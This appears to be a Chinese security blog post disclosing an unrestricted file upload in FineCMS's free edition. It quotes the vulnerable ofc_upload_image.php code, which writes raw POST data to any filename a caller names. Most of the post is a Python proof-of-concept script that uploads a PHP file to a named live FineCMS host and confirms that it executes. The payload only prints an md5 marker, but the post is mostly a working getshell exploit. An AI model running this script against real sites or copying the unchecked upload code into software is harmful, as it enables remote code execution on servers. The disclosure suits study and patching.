FIneCMS免费版无条件getshell

没穿底裤 2020年1月1日06:03:04评论465 views字数 1023阅读3分24秒阅读模式
摘要

路径:dayrui/libraries/Chart/ofc_upload_image.php无任何限制,可以直接上传。。poc:

路径:dayrui/libraries/Chart/ofc_upload_image.php

$default_path = '../tmp-upload-images/';  if (!file_exists($default_path)) mkdir($default_path, 0777, true);  $destination = $default_path . basename( $_GET[ 'name' ] );   echo 'Saving your image to: '. $destination;  $jfh = fopen($destination, 'w') or die("can't open file"); fwrite($jfh, $HTTP_RAW_POST_DATA); fclose($jfh);

无任何限制,可以直接上传。。

poc:

#!/usr/bin/env python  # -*- coding: utf-8 -*-  #__author__ = '1c3z'    import urllib2  import random    fileName = "shell" + str(random.randrange(1000,9999)) + ".php"  target = "http://v1.finecms.net/dayrui/libraries/Chart/ofc_upload_image.php"  def uploadShell():      url = target + "?name=" + fileName      req = urllib2.Request(url, headers={"Content-Type": "application/oct"})       res = urllib2.urlopen(req, data="<?print(md5(0x22))?>")      return res.read()    def poc():      res = uploadShell()      if res.find("tmp-upload-images") == -1:          print "Failed !"          return        print "upload Shell success"      url = "http://v1.finecms.net/dayrui/libraries/tmp-upload-images/" + fileName      md5 = urllib2.urlopen(url).read()      if md5.find("e369853df766fa44e1ed0ff613f563bd") != -1:          print "poc: " + url    poc()

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日06:03:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   FIneCMS免费版无条件getshellhttp://cn-sec.com/archives/76513.html

发表评论

匿名网友 填写信息